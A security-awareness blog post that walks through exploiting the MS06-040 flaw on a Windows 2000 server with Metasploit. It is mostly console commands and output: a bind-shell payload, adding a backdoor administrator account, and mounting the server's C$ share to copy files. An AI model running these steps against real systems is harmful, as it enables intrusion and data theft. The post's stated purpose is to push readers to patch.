Blog |Follow Nick on Twitter| About

It would have been irresponsible of me to write this any earlier, but a few days of past and hopefully the majority have installed the appropiate patch or at the very least are running personal/perimeter firewalls until they complete their change control.

Many may have seen e-mail alerts and news articles that say exploit in the wild and may not appreciate what this actually means. You hear people say "It'll never happen to me" or "it's only geeky Linux kids who can do this, my business isn't at risk"; OK but do you know actually how easy it is ?

Myth Number 1: You need to be Linux literate to hack. It is true that many hacking tools are built for *nix, and many will say they are the best (heck I'm using Linux now, so I'm not going to argue!) but many tools have been ported to windows (or Mac if you prefer), and if you think your average help-desk junkie is fairly windows literate, how difficult is it to point & click ? - are you concerned yet ?

Myth Number 2: Hacking is hard. Proper hacking - finding exploits in code yes, but what the public means as hacking, like copying files off your PC, no. I'm going to show you how to use a windows PC to Hack a vulnerable server, create an administrator account which will allow you to copy the contents of the severs hard drive.

OK, so exploit in the wild means, a popular hacking website has published a working exploit, in the case of MS06-040 Milw0rm did, here. What made this exploit interesting is that it was published as part of the popular pen testing tool Metasploit, which yep you guessed it, runs on windows !

So to get started, download and install metasploit (I'll be using Framework 2.6).

Once that's installed you'll need to update it with the latest available exploits, so click start -> metasploit framework -> msfupdate , and watch it do it's thing. (for Linux or mac people you need to run msfupdate -u.) During the update you'll see that it downloads, in windows world you have to be quick, as the window closes when it's finished updating, but linuxy's will be able to see, this is the exploit as published on Milw0rm.

Now there is a web GUI to metasploit framework, but (i) I didn't find it that easy to use & (ii) it's quite difficult to write an article saying point & click :wink: , so to hack (and I use the term loosely) we're going to use the console, which is a little like a router console, limited commands not as overwhelming as a full command shell/terminal. So windows users start -> metspolit framework -> msfconsole (mac & Linux, just type msfconsole), and you'll get a black box that looks a little like this:

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}

                 888                           888        d8b888
                 888                           888        Y8P888
                 888                           888           888

88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888

  • -- --=[ msfconsole v2.6 [153 exploits - 76 payloads]

msf >

So to get started, you can just type *help* to see a list of commands:

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
msf > help

Metasploit Framework Main Console Help

        ?            Show the main console help
        cd           Change working directory
        exit         Exit the console
        help         Show the main console help
        info         Display detailed exploit or payload information
        quit         Exit the console
        reload       Reload exploits and payloads
        save         Save configuration to disk
        setg         Set a global environment variable
        show         Show available exploits and payloads
        unsetg       Remove a global environment variable
        use          Select an exploit by name
        version      Show console version

show exploits will give a list of available exploits, and we want netapi_ms06_040, so type use netapi_ms06_040, notice how the prompt has changed :

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"} msf> use netapi_ms06_040 msf netapi_ms06_040 >

Right the next thing you need is something to attack, now I've got a
windows 2000 server sp4 waiting with an ip address of, so
to tell metasploit what to attack, you need to set a remote host
variable. For the unfamiliar a variable is a word that represents
something (*I'm not a programmer so sorry for the crap definition*), so
we're gonna set the word RHOSTto

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
msf netapi_ms06_040 >set RHOST
msf netapi_ms06_040 >

The final thing to do is to set up a payload. A payload is what you want to happen after you've exploited, show payloads :

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"} msf netapi_ms06_040 > show payloads

Metasploit Framework Usable Payloads

win32_adduser Windows Execute net user /ADD win32_bind Windows Bind Shell win32_bind_dllinject Windows Bind DLL Inject win32_bind_meterpreter Windows Bind Meterpreter DLL Inject win32_bind_stg Windows Staged Bind Shell win32_bind_stg_upexec Windows Staged Bind Upload/Execute win32_bind_vncinject Windows Bind VNC Server DLL Inject win32_downloadexec Windows Executable Download and Execute win32_exec Windows Execute Command win32_reverse Windows Reverse Shell win32_reverse_dllinject Windows Reverse DLL Inject win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject win32_reverse_ord Windows Staged Reverse Ordinal Shell win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject win32_reverse_stg Windows Staged Reverse Shell win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute win32_reverse_vncinject Windows Reverse VNC Server Inject

Gives a nice list of what's available, anything from command shells to
full [vnc]( guis. I'm going to pick the simplest
which is win32\_bind, when successful, this will change our metasploit
console into a command prompt (start -\> run -cmd.exe) on the attacked
machine, thus allowing us to run any commands we like !

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
 msf netapi_ms06_040 >set PAYLOAD win32_bind
PAYLOAD -> win32_bind
 msf netapi_ms06_040(win32_bind) >

Before we go any further it's best to check we've got everything; the show options command is massively useful because it show us what settings (or variables) we need before an exploit will work.

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"} msf netapi_ms06_040(win32_bind) > show options

Exploit and Payload Options

Exploit: Name Default Description -------- ------- -------------- --------------------------------------- required RHOST The target address optional SMBDOM The domain for specified SMB username optional SMBUSER The SMB username to connect with optional SMBPASS The password for specified SMB username

Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 4444 Listening port for bind shell

Target: (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

msf netapi_ms06_040(win32_bind) >

As you can see we set the required RHOST, the others are optional (so
we'll ignore them) and the other required have been sorted for us :-)

So the final touch is to hack ! Type *exploit*

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
msf netapi_ms06_040(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target
[*] Sending request...
[*] Got connection from <->

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


Success ! (pat your self on the back!) you now have a working command line, now if you're not that literate with windows command line you may think, so what !?!?! Well take a look at the following, we'll set up a user called h4x0r, with password P455w0rd, and add him/her to the administrators group:

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"} C:\WINNT\system32>net user h4x0r P455w0rd /add net user h4x0r P455w0rd /add The command completed successfully.

C:\WINNT\system32>net localgroup administrators h4x0r /add net localgroup administrators h4x0r /add The command completed successfully.

C:\WINNT\system32>net localgroup administrators net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain


Administrator h4x0r The command completed successfully.


Now we have an administrator on that machine we can pretty much do what
we like, so you windows users can mount the "C" drive as a remote hard
drive and copy & read any file you like. So <u>from your pc **where
metasploit is installed**</u> click start -\> run , type cmd.exe; notice
how the shell looks the same as the metasploit one ? and type

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
net use x: \\\c$ P455w0rd /user:h4x0r

Finally windows people, under the "My Computer" of your machine you have an "X" drive of the server you attacked ! (Linux users you'll have to use Samba to do the same, sorry Mac'ers I don't know for you!)

In Summary
Yes this is a little long winded, but if you've read it you'll see actually how easy it was, download a hacker program, install, type a couple of commands, and copy your victims files; now do you think this is beyond anyone on your IT departments help-desk ? do you really think they should be copying files off of the CEO's laptop ?

It's is my hope that, with all the news hype, and articles like this people will follow basic security practices, at home as well as at work, and thus making a better Internet for us all ! :cool:



Nick Bettison ©